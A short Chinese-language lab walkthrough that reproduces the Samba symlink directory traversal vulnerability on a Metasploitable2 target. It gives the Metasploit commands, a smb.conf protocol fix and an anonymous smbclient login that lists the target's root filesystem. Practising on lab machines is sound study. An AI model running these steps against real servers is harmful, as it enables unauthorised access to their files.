复现Samba sysmlink默认配置目录遍历漏洞
一、环境基础准备
环境:metaspoitable2
靶机IP:192.168.211.141
打开metaspoitable2查看靶机IP
ifconfig
二、进入kali
打开kali,输入msfconsole,进入msf控制台
msfconsole
在msf中搜索samba
search samba
第0个即为需要使用的漏洞,输入 use 0进行利用
use 0
输入show options 查看需要设置的参数
show options
将smbshare设置为tmp
set smbshare tmp
设置靶机IP
set rhost 192.168.211.141
直接run利用可能会发生报错
protocol negotiation failed: NT_STATUS_CONNECTION_RESET
所以需要先在配置文件/etc/samba/smb.conf的global设置下添加
client min protocol = CORE
client max protocol = SMB3
新建一个控制台窗口,输入命令修改配置文件
vim /etc/samba/smb.conf
将下面两行粘贴到配置文件中[global]下面
client min protocol = CORE
client max protocol = SMB3
输入完保存退出即可
三、连接靶机
使用smbclient命令连接靶机的tmp文件夹
smbclient //192.168.211.141/tmp
提示输入密码,直接按下回车即可,这样就是使用匿名模式登录
再输入cd rootfs开始执行命令
cd rootfs
输入ls即可查看文件
ls